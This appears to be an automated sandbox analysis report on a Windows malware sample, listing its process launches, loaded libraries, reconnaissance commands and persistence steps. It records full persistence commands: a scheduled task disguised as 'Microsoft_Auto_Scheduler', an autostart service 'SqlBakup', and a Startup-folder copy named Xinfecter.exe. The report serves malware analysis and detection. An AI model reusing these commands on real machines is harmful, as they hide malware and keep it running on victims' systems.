        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs" Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\systeminfo.exe systeminfo
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /i "original"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /C echo C:\Users\user\AppData\S-6748.bat
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\S-6748.bat" "
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /v
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I /c "dcdcf"
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Section loaded: apphelp.dll
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Section loaded: netapi32.dll
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Section loaded: wininet.dll
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Section loaded: samcli.dll
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Section loaded: dsrole.dll
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Section loaded: netutils.dll
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Section loaded: cryptsp.dll
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Section loaded: rsaenh.dll
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Section loaded: cryptbase.dll
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Section loaded: sspicli.dll
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Section loaded: ntmarta.dll
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Section loaded: samlib.dll
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Section loaded: mpr.dll
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Section loaded: iertutil.dll
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Section loaded: windows.storage.dll
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Section loaded: wldp.dll
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Section loaded: profapi.dll
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Section loaded: kernel.appcore.dll
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Section loaded: ondemandconnroutehelper.dll
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Section loaded: winhttp.dll
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Section loaded: mswsock.dll
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Section loaded: iphlpapi.dll
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Section loaded: winnsi.dll
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Section loaded: urlmon.dll
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Section loaded: srvcli.dll
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Section loaded: dnsapi.dll
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Section loaded: rasadhlp.dll
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Section loaded: fwpuclnt.dll
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Section loaded: napinsp.dll
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Section loaded: pnrpnsp.dll
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Section loaded: wshbth.dll
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Section loaded: nlaapi.dll
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Section loaded: winrnr.dll
        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: version.dll
        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: mpr.dll
        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: framedynos.dll
        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: dbghelp.dll
        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: netutils.dll
        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: wbemcomn.dll
        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: winsta.dll
        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: amsi.dll
        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: userenv.dll
        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: profapi.dll
        Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll
        Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: uxtheme.dll
        Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: windows.storage.dll
        Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: wldp.dll
        Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: propsys.dll
        Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: profapi.dll
        Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: edputil.dll
        Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: urlmon.dll
        Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: iertutil.dll
        Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: netutils.dll
        Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: windows.staterepositoryps.dll
        Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: policymanager.dll
        Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: msvcp110_win.dll
        Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: wintypes.dll
        Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: appresolver.dll
        Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: bcp47langs.dll
        Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: slc.dll
        Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: userenv.dll
        Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: sppc.dll
        Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: onecorecommonproxystub.dll
        Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: onecoreuapcommonproxystub.dll
        Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: pcacli.dll
        Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: mpr.dll
        Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: sfc_os.dll
        Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: version.dll
        Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: uxtheme.dll
        Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sxs.dll
        Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: vbscript.dll
        Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: amsi.dll
        Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: userenv.dll
        Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: profapi.dll
        Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wldp.dll
        Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msasn1.dll
        Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptsp.dll
        Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: rsaenh.dll
        Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptbase.dll
        Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msisip.dll
        Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wshext.dll
        Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrobj.dll
        Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: mpr.dll
        Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrrun.dll
        Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: gpapi.dll
        Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: windows.storage.dll
        Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: propsys.dll
        Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: edputil.dll
        Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: urlmon.dll
        Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: iertutil.dll
        Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: netutils.dll
        Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: windows.staterepositoryps.dll
        Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wintypes.dll
        Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: appresolver.dll
        Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: bcp47langs.dll
        Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: slc.dll
        Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sppc.dll
        Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: onecorecommonproxystub.dll
        Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
        Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
        Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: xmllite.dll
        Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: mpr.dll
        Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: framedynos.dll
        Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: version.dll
        Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: wbemcomn.dll
        Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: amsi.dll
        Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: userenv.dll
        Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: profapi.dll
        Source: C:\Windows\SysWOW64\find.exe | Section loaded: ulib.dll
        Source: C:\Windows\SysWOW64\find.exe | Section loaded: fsutilext.dll
        Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll
        Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll
        Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe | Section loaded: ncobjapi.dll
        Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
        Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
        Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe | Section loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe | Section loaded: amsi.dll
        Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
        Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe | Section loaded: profapi.dll
        Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe | Section loaded: version.dll
        Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe | Section loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe | Section loaded: ntmarta.dll
        Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe | Section loaded: esscli.dll
        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: version.dll
        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: mpr.dll
        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: framedynos.dll
        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: dbghelp.dll
        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: netutils.dll
        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: wbemcomn.dll
        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: winsta.dll
        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: amsi.dll
        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: userenv.dll
        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: profapi.dll
        Source: C:\Windows\SysWOW64\find.exe | Section loaded: ulib.dll
        Source: C:\Windows\SysWOW64\find.exe | Section loaded: fsutilext.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: uxtheme.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: windows.storage.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: wldp.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: propsys.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: profapi.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: edputil.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: urlmon.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: iertutil.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: srvcli.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: netutils.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: windows.staterepositoryps.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: policymanager.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: msvcp110_win.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: sspicli.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: wintypes.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: appresolver.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: bcp47langs.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: slc.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: userenv.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: sppc.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: onecorecommonproxystub.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: onecoreuapcommonproxystub.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: pcacli.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: mpr.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: sfc_os.dll
        Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: mpr.dll
        Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: framedynos.dll
        Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: version.dll
        Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: amsi.dll
        Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: userenv.dll
        Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: profapi.dll
        Source: C:\Windows\SysWOW64\find.exeSection loaded: ulib.dll
        Source: C:\Windows\SysWOW64\find.exeSection loaded: fsutilext.dll
        Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
        Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\tasklist.exe | Section loaded: srvcli.dll
        Source: C:\Windows\System32\tasklist.exe | Section loaded: netutils.dll
        Source: C:\Windows\System32\tasklist.exe | Section loaded: sspicli.dll
        Source: C:\Windows\System32\tasklist.exe | Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\tasklist.exe | Section loaded: wbemcomn.dll
        Source: C:\Windows\System32\tasklist.exe | Section loaded: winsta.dll
        Source: C:\Windows\System32\tasklist.exe | Section loaded: amsi.dll
        Source: C:\Windows\System32\tasklist.exe | Section loaded: userenv.dll
        Source: C:\Windows\System32\tasklist.exe | Section loaded: profapi.dll
        Source: C:\Windows\System32\find.exe | Section loaded: ulib.dll
        Source: C:\Windows\System32\find.exe | Section loaded: fsutilext.dll
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Section loaded: apphelp.dll
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Section loaded: netapi32.dll
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Section loaded: wininet.dll
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Section loaded: samcli.dll
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Section loaded: dsrole.dll
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Section loaded: netutils.dll
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Section loaded: cryptsp.dll
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Section loaded: rsaenh.dll
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Section loaded: cryptbase.dll
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Section loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: version.dll
        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: mpr.dll
        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: framedynos.dll
        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: dbghelp.dll
        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: netutils.dll
        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: wbemcomn.dll
        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: winsta.dll
        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: amsi.dll
        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: userenv.dll
        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: profapi.dll
        Source: C:\Windows\SysWOW64\find.exe | Section loaded: ulib.dll
        Source: C:\Windows\SysWOW64\find.exe | Section loaded: fsutilext.dll
        Source: C:\Windows\SysWOW64\timeout.exe | Section loaded: version.dll
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\systeminfo.exe systeminfo
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /v /fo csv
        Source: Window Recorder | Window detected: More than 3 window changes detected
        Source: 8AbMCL2dxM.exe | Static file information: File size 1260544 > 1048576
        Source: 8AbMCL2dxM.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
        Source: 8AbMCL2dxM.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
        Source: 8AbMCL2dxM.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
        Source: 8AbMCL2dxM.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: 8AbMCL2dxM.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
        Source: 8AbMCL2dxM.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
        Source: 8AbMCL2dxM.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
        Source: 8AbMCL2dxM.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: 8AbMCL2dxM.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
        Source: 8AbMCL2dxM.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
        Source: 8AbMCL2dxM.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
        Source: 8AbMCL2dxM.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
        Source: 8AbMCL2dxM.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_009508CF LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_009508CF
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_009423C6 push ecx; ret 1_2_009423D9
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_00941D57 push ecx; ret 1_2_00941D6A
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_002A23C6 push ecx; ret 42_2_002A23D9
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_002A1D57 push ecx; ret 42_2_002A1D6A

        Persistence and Installation Behavior

        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | File created: C:\Windows\SysMain.sys
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | File created: C:\Users\user\AppData\N-Save.sys
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe

        Boot Survival

        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\user\AppData\S-2153.bat'" /f
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe\:Zone.Identifier:$DATA
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\sc.exe sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto

        Hooking and other Techniques for Hiding and Protection

        Source: unknown | Network traffic detected: HTTP traffic on port 49742 -> 3586
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_0092A108 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_0092A108
        Source: C:\Windows\SysWOW64\tasklist.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\systeminfo.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\tasklist.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\systeminfo.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\tasklist.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\tasklist.exe | Process information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        Source: C:\Windows\SysWOW64\cmd.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
        Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
        Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
